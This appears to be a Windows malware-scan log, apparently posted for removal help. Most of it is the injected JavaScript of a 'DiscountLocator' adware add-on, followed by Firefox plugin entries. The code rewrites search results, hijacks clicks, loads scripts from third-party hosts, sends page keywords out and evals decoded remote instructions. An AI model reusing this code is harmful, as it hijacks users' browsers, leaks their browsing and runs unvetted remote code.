a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&& (b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/...te2\");return!0}}}; var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]= d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert|| \"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&& (a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}}; b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector, e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)\"string\"===typeof a&&(a=a.replace(/\\\"/g,'\\\\\"'));return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a); d=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(var e=0;e<d.length;e++)a=a.replace(RegExp(\"\\\\[##\"+d[e].replace+\"##\\\\]\",\"g\"),d[e][\"with\"]);try{return\"undefined\"!==typeof c.pxl&&\"\"!==c.pxl&&b.utils.sendPixels(c.pxl),JSON.parse(a)}catch(f){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d, c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&& __yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at; break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(var e=0;e<b.num_of_items_in_one&&0!=c.length;e++){var f=b.get_item_json(a,c[0]);try{b.insert_point.children.push(f)}catch(g){b.insert_point=d,b.insert_point.children.push(f)}\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()}};b.addEventsToItems= function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"== typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom);if(!c.match(/\\[##eid##\\]/))return a;c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse©;return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node= b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)},!1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a; if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if©for(var d=0;d<c.length;d++)b.events.add(\"click\",function(){try{var b=a(this)}catch©{}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c= __yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name= a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&& \"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)}; b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=7436871928167141055&eid=72&pid=1&prid=316\"; \"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens(): (0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}}); ;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//api.jollywallet.com/affiliate/client?dist=87&sub=pnd&name=DiscountLocator\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;window._rvz1017x1008={publisher_subid:\"72_1\",addonname:\"DiscountLocator\"};(function () { if (!document.getElementById(\"qwejkhjkshdf\") && window.self == window.top) { var a = document.createElement(\"script\"); a.type ='text/javascript'; a.src = \"//asrv-a.akamaihd.net/sd/1017/1008.js\"; a.setAttribute(\"id\", \"qwejkhjkshdf\");document.getElementsByTagName('head')[0].appendChild(a)}})();;(function(){if(!document.getElementById(\"qwejkhjkshdfs_4\")&&window.self==window.top){var a=document.createElement(\"script\");a.id=\"inj_grazit_script_starter\";a.type=\"text/javascript\";a.src=\"//ext1.engageya.com/widget/inject_spark/inj_sprk_starter.js?pid=LTEsMTQyNTU5LDk0NjA4LDU0OTcx&subid=72_1&appname=DiscountLocator\";a.setAttribute(\"id\",\"qwejkhjkshdfs_4\");document.getElementsByTagName(\"head\")[0].appendChild(a)}})();;new function(){if(!document.getElementById(\"dsfmd1safskdfsd5yaaka\")&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//intext.nav-links.com/js/intext.js?afid=wp2&subid=72_1&maxlinks=1&linkcolor=0000FF&brand=DiscountLocator\";a.setAttribute(\"id\",\"dsfmd1safskdfsd5yaaka\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;new function(){if(!document.getElementById(\"__if72ru4sdfsdfrkjahiuyi_once\")){(function(){var a=document.createElement(\"div\");a.id=\"__if72ru4rkjahiuyi_once\";a.setAttribute(\"style\",\"display:none;\");var b=document.getElementsByTagName(\"body\")[0];b&&b.appendChild(a)})();var c=this;c.prefix=\"if72ru4rkjahiuyi\";c.extName=\"DiscountLocator\";c.version=\"0.1.0\";c.pop_collision_id=\"__ipu=\";c.pixelHostname=\"//direct_pop.installerdatauk.info/\";c.hostname=[\"compey.net\",\"comprises.info\"];c.body=document.getElementsByTagName(\"body\")[0]; c.directParams={subid:\"1\",subid1:\"7436871928167141055\",subid2:\"72\",direct:\"1\",tid:\"6\"};c.adTypes={_1:{key:\"728x90\"},_2:{key:\"300x250\"},_3:{key:\"468x60\"},_4:{key:\"250x250\"},_5:{key:\"160x600\"},_6:{key:\"120x600\"},_7:{key:\"120x240\"},_8:{key:\"240x400\"},_10:{key:\"300x600\"},_9:{key:\"1024x728\"},_11:{key:\"670x670\"},_12:{key:\"600x270\"},_13:{key:\"600x400\"}};c.utils=new function(){var a=this;a.cookie=new function(){var b=this;b.setCookie=function(b,a,d){if(d){var c=new Date;c.setTime(c.getTime()+ 864E5 * d);d=\"; expires=\"+c.toGMTString()}else d=\"\";document.cookie=b+\"=\"+a+d+\"; path=/\"};b.getCookie=function(b){b+=\"=\";for(var a=document.cookie.split(\";\"),c=0;c<a.length;c++){for(var g=a[c];\" \"==g.charAt(0);)g=g.substring(1,g.length);if(0==g.indexOf(b))return g.substring(b.length,g.length)}return null};b.eraseCookie=function(a){b.setCookie(a,\"\",-1)}};a.getProtocol=function(b){var a=document.createElement(\"a\");a.href=b;return a.protocol};a.getInstructions=function(b,f){a.msie&&11>a.msie?a.inject_script(b+ (\"&cb=\"+c.prefix+\".\"+f)):a.ajax.get(b,function(b){if(b)c[f](b)})};a.l=new function(){this.xlat=\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\";this.decode=function(b){b=b.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var a=\"\",c=0;c<b.length;){var d=this.xlat.indexOf(b.charAt(c++)),g=this.xlat.indexOf(b.charAt(c++)),h=this.xlat.indexOf(b.charAt(c++)),l=this.xlat.indexOf(b.charAt(c++)),k=(g&15)<<4|h>>2,m=(h&3)<<6|l,a=a+String.fromCharCode(d<<2|g>>4);64!=h&&0<k&&(a+=String.fromCharCode(k)); 64 != l &&0<m&&(a+=String.fromCharCode(m))}return this._utf8_decode(a)};this._utf8_decode=function(b){for(var a=\"\",c=0;c<b.length;){var d=b.charCodeAt©;if(128>d)a+=String.fromCharCode(d),c++;else if(191<d&&224>d)var g=b.charCodeAt(c+1),a=a+String.fromCharCode((d&31)<<6|g&63),c=c+2;else var g=b.charCodeAt(c+1),h=b.charCodeAt(c+2),a=a+String.fromCharCode((d&15)<<12|(g&63)<<6|h&63),c=c+3}return a}};a.ajax=new function(){this.get=function(b,a){try{var c=new XMLHttpRequest;c.open(\"GET\",b,!0);c.withCredentials= !0; c.onreadystatechange=function(){4==c.readyState&&a(c.responseText)};c.send()}catch(d){}}};a.randomChar=function(){for(var b=\"\",a=0;2>a;a++)b+=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\".charAt(Math.floor(52*Math.random()));return b};a.msie=function(){var b=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(b)&&(b=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(b)?!1:b}();a.inject_script=function(b){var a= document.getElementsByTagName(\"body\")[0],e=document.createElement(\"script\");e.type=\"text/javascript\";e.id=\"id_\"+c.prefix;e.src=b;a&&a.appendChild(e)};a.epoch=function(){return Math.floor((new Date).getTime()/1E3)};a.getVert=function(){var b=localStorage.getItem(\"sk398erjds2d\");return b?b:a.forexVert()};a.browser=function(){var b=navigator.userAgent.toLowerCase(),a={webkit:/webkit/.test(b),mozilla:/mozilla/.test(b)&&!/(compatible|webkit)/.test(b),chrome:/chrome/.test(b),msie:/msie/.test(b)&&!/opera/.test(b), firefox:/firefox/.test(b),safari:/safari/.test(b)&&!/chrome/.test(b),opera:/opera/.test(b)};a.version=a.safari?(b.match(/.+(?:ri)[\\/: ]([\\d.]+)/)||[])[1]:(b.match(/.+(?:ox|me|ra|ie)[\\/: ]([\\d.]+)/)||[])[1];return a}();a.getNodeTextProp=function(b){return\"textContent\"in b?\"textContent\":\"innerText\"in b?\"innerText\":!1};a.dhtml_prop_name=function(b){return b.replace(/(\\-([a-z]){1})/g,function(b,a,c){return c.toUpperCase()})};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function©{\"float\"== c &&(c=\"styleFloat\");c=a.dhtml_prop_name©;return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[c]?b.currentStyle[c]:null}}}:function(b,a){return window.getComputedStyle(b,a)||{getPropertyValue:function(){}}}};c.dom=new function(){this.json_to_html=function(a,b){if(\"#text\"==a.type)b=document.createTextNode(a.text);else if(\"#comment\"!=a.type){b||(b=document.createElement(a.type));if(a.attrs){for(var f in a.attrs)if(a.attrs.hasOwnProperty(f))if(\"style\"==f&& a.attrs.style instanceof Object)for(var e in a.attrs.style){var d=c.utils.dhtml_prop_name(e);try{b.style[d]=a.attrs.style[e]}catch(g){}}else b.setAttribute(f,a.attrs[f]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(b.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(b.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(b.marginHeight=a.attrs.marginheight))}if(a.children)for(f=0;f<a.children.length;f++){d=a.children[f];e=arguments.callee(d); try { b.appendChild(e)}catch(h){if(\"#text\"==d.type&&\"string\"==typeof d.text)if(\"style\"==a.type&&b.styleSheet)b.styleSheet.cssText=d.text||\"\";else if(e=c.utils.getNodeTextProp(b))b[e]=d.text}}}return b}};c.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,c,e,d,g){\"undefined\"==typeof d&&(d=window);d.addEventListener(b,c,e);g&&a.cache.push([b,c,e,d])}:window.attachEvent?function(b,c,e,d,g){\"undefined\"==typeof d&&(d=window);d[\"e\"+b+c]=c;d[b+c]=function(){d[\"e\"+b+c](window.event)}; d.attachEvent(\"on\"+b,d[b+c]);g&&a.cache.push([b,c,e,d])}:function(){};a.remove=window.removeEventListener?function(b,a,c,d){\"undefined\"==typeof d&&(d=window);d.removeEventListener(b,a,c)}:window.detachEvent?function(b,a,c,d){\"undefined\"==typeof d&&(d=window);d.detachEvent(\"on\"+b,d[b+a]);d[b+a]=null;d[\"e\"+b+a]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};c.pixel=function(a,b){var f=c.pixelHostname+\"?\",e=c.hostname[\"https:\"==window.self.location.protocol? 0 : 1], e ={pid:\"1\",cc:\"US\",eid:\"72\",hid:\"7436871928167141055\",v:c.version,ch:b,cid:c.response[0][2],tid:c.directParams.tid,adtid:c.response[0][4],smid:c.response[0][3],pbid:a,oh:encodeURIComponent(c.response[0][0]),sh:encodeURIComponent(e)},d;for(d in e)f+=d+\"=\"+e[d]+\"&\";f=f.slice(0,-1);(new Image).src=f};c.products=new function(){this.code_7=function(a){function b(){var a=document.getElementById(\"__modal_close\"),b=document.getElementById(\"__modal_container\"); c.events.add(\"click\",function(){b.parentNode.removeChild(b)},!1,a,!1)}function f(){var a,b;\"undefined\"==typeof c.response[0][4]&&c.response[0].push(9);a=c.adTypes[\"_\"+c.response[0][4]].key;b=a.split(\"x\")[0];a=a.split(\"x\")[1];var d=window.innerHeight;if(b&&a){var f=document.getElementById(\"__modal\");f.style.width=b+\"px\";f.style.height=a+\"px\";f.style.marginLeft=parseInt(f.style.width)/2-parseInt(f.style.width)+\"px\";f.style.top=(d-parseInt(f.style.height))/2+\"px\"}}if((a=a[0][0])&&window.self.location.protocol=== c.utils.getProtocol(a)&&!(c.utils.msie&&9>c.utils.msie)&&\"http:\"===a.split(\"/\")[0]){var e={type:\"div\",attrs:{id:\"__modal_container\",style:{position:\"fixed\",\"z-index\":\"9999999999\",height:\"100%\",width:\"100%\",margin:\"0\",padding:\"0\",background:\"rgba(0,0,0,0.3)\",top:\"0\",right:\"0\",bottom:\"0\",left:\"0\",\"border-radius\":\"0\"}},children:[{type:\"div\",attrs:{id:\"__modal\",style:{position:\"absolute\",\"z-index\":\"99999999999\",left:\"50%\",top:\"10px\",\"text-align\":\"left\",width:\"90%\",margin:\"0 0 0 -45%\",\"background-color\":\"#FFFFFF\", border:\"1px solid #DDDDDD\",\"border-radius\":\"5px\",height:\"90%\",padding:\"0\"}},children:[{type:\"div\",attrs:{style:{margin:\"0\",padding:\"2px\",left:\"0\",width:\"inherit\",top:\"0\",\"background-color\":\"transparent\"},id:\"__modal_close\"},children:[{type:\"img\",attrs:{src:\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABYAAAAWCAYAAADEtGw7AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAABA1JREFUeNp8VW9IW1cUP3l5eS9iZx+amsaNtNZsdtgttnSkBYmRLEsVs1rwi9Z9Udm6YZXYTr+MaMcm4idXPwTUD05BWP3bNBsleREUoabMTzr/wNxEjQqCgoj/Gr2792re8prUC4f3znnn/M65757zuwqEEMRbLMfxXzocV/MLCswfZ2bakpKSTAqFAra3t4ML//zr93pfjL3weOb29vYO4gIQ4GjBwWx1dbVlfn5e3NjYQBHBOpqamkLRtoWFBfEh9mUYhn0bR6ZotTrB5/O5SNDq6irq6OhAxcXFSK1Wy8Rms6G2tja0vLxME4iBgEt78aIQF1in0wnT09Nu4uj1epHRaEQ8z8eARovJZELj4+ORHbk/0OsFGTCLV2BkhFba1dUlBUYDn5WkpaWFggeDQRfHq1kJ2NXQaIlUelaFZ0l7ezsF/7mpyUKBNamp/NLSkogFZWVlyZytVivKz8+PATEYDKimpgZd0GolW9L582h2dhatra2JaWlpPNR+/9hIMrndbllwTk6OdPrNzc3UlpCQgLKzsykAsXd2dspinE4ntT958qORseZZzaTthoeHZS2I+xX29/epXlFRAY2NjYB3BL29vaDRaKh9Z2dHiiE9PjA0BMfHx3Dnjt0MoVDIs7i4GPe/lZaWopWVFaly4hd57+/vjxszMTGB1tfXPYxKpTJtbm7GDA1Zg4ODUFdXB4eHh1RPTEykz9HRUSgrK4s7cBgUlEqliSFbODo6kn0ktsjC0wW7u7uy78QWb0VjMViCycnJcR0/NRqhu7sbBEGgeiSovLwcGhoaqB4th+EwpKSkEJcgg8fSjwkGMjIyZKDJ2KEHg0aSku0/dNbCwcEJ51RWVkJ1TS28OQZ4g/OF8fMIi/7SJdja2vIzflEcI44Oh0MG/Mm1azLQkpISGHjWB85HjyXwz25eP/0H+Fzwo6joLrx37hw8/8M3Btdv3ODxKYuEvTSp2pi+rK+vp+/4kBEoT8RssZIJQ+kfZlJdgckNFCr00ucnHSMab97iaQf82tNDR7q1tfWdI0uAFcr/wRklhxiGk/QH335H27BvYMgiccXly+ks7mdKQlVVVTGgfIIasbRiVgIiVSpZkoxDn9vtmGbXSc+7dPp0Vkablrw8AQNT2mzC25RAsXBYlKqTKiPgzGmCr795gFZCIVKt2154V4hL9F/Y7QLJSsAnJycRHmWkuZCKOBWumFTHnACSX1J07x4KBEbo9jHxuAqLimVEr3j7zku/coV9+svTnNu3b/2AVSuZOsx8MDMzg09eAQbDR6DXv09PH6/Aq9d//uSsfTT+99xfYdmwvOsyzc3N5e/f/+pqYWGBmeM4GzaZTj8Fw+Gwf9Dz+9hvz/rmRsWXcS/T/wQYAL8KChTqW9Z8AAAAAElFTkSuQmCC\", style: {cursor:\"pointer\"}}},{type:\"span\",attrs:{style:{position:\"relative\",\"margin-left\":\"20px\",\"font-size\":\"12px\",\"line-height\":\"33px\"}},children:[{type:\"#text\",text:\"Ads by DiscountLocator\"}]}]},{type:\"iframe\",attrs:{style:{border:\"0\"},id:\"__modal_iframe\",width:\"100%\",height:\"100%\",frameboarder:\"0\",scrolling:\"yes\",marginheight:\"0\",marginwidth:\"0\",allowtransparency:\"true\",src:\"\"}}]}]};try{var d=c.dom.json_to_html(e)}catch(g){}d&&(document.getElementsByTagName(\"body\")[0].appendChild(d),document.getElementById(\"__modal_iframe\").src= a, c.pixel(\"0\",\"1\"),b(),f())}}};c.getKeywords=function(){var a=document.title,b=document.getElementsByTagName(\"meta\");if(b)for(var c=0,e=b.length;c<e;c++)\"keywords\"!=b[c].name.toLowerCase()&&\"description\"!=b[c].name.toLowerCase()||(a+=\" \"+b[c].content.replace(/,/g,\" \"));if(c=document.getElementsByTagName(\"a\")){b={};for(e=0;e<c.length;e++)try{var d=c[e].innerText;\"undefined\"==typeof d&&(d=c[e].textContent);for(var g=d.toLowerCase().split(/[\\s,-]/g),h=0;h<g.length;h++)4>g[h].length||(b[g[h]]?b[g[h]]++: b[g[h]]=1)}catch(l){}var d=[],k;for(k in b)d.push([k,b[k]]);d.sort(function(a,b){return b[1]-a[1]});d=d.slice(0,25);for(k=0;k<d.length;k++)a+=\" \"+d[k][0]}return a.replace(/[_-]/g,\" \").substring(0,1024)};c.injectComplianceBanner=function(){var a=document.getElementsByTagName(\"body\")[0];if(0!=a.children.length){var b=document.createElement(\"div\");b.id=\"cmsie\";var f='<span style=\"font: xx-small;color: rgb(153, 153, 153);height: 15px;  font-family: Tahoma;font-size: 8px;padding-right: 22px;padding-top: 1px;float: right;  top: 2px;  text-decoration: none;line-height: 15px;\">Ad by '+ c.extName+\"</span>\";b.setAttribute(\"style\",\"height: 15px;position: relative;background-color: #F9F9F9;border: none;border-radius:0\");b.innerHTML=f;a.insertBefore(b,a.children[0])}};c.prepareUrl=function(){var a=\"?\",b;for(b in c.directParams)a+=b+\"=\"+c.directParams[b]+\"&\";a+=\"k=\"+encodeURIComponent(c.getKeywords());return\"//\"+c.hostname[\"http:\"==window.self.location.protocol?0:1]+a};c.tp=function(a){if(a){a=c.utils.l.decode(a);try{c.response=eval(a)}catch(b){}if(c.response&&c.response[0]&&(c.response[0][0]= c.response[0][0].replace(\"zig_pp\",\"rTnKrTa4vTn4vTw6qV1Fqdw8qHUErHs4\"),a=c.response[0][3],a=7,7===a&&\"function\"==typeof c.products[\"code_\"+a]))c.products[\"code_\"+a](c.response)}};c.getInstructions=function(a){var b=\"&cb=\"+c.prefix+\".tp\";c.utils.msie?c.utils.inject_script(a+b):c.utils.ajax.get(a,function(a){a&&c.tp(a)})};c.initPop=function(){if(-1!==window.location.href.indexOf(c.pop_collision_id))return c.injectComplianceBanner();var a=c.prepareUrl();c.utils.getInstructions(a,\"tp\")};window.self==window.top&& c.initPop();\"undefined\"==typeof window[c.prefix]&&(window[c.prefix]=c)}};;new function(){if(!document.getElementById(\"sdfgdfg43iddfhgfs43af\")&&window.self==window.top){var a=document.createElement(\"script\");a.setAttribute(\"id\",\"sdfgdfg43iddfhgfs43af\");a.src=\"https://www.tr553.co...].appendChild(a)}};})();");
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:32.0.3
 
 
FF:[b]64bit:
- HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF64_15_0_0_223.dll File not found
FF:[b]64bit:
- HKLM\Software\MozillaPlugins\@mcafee.com/MSC,version=10: c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_223.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
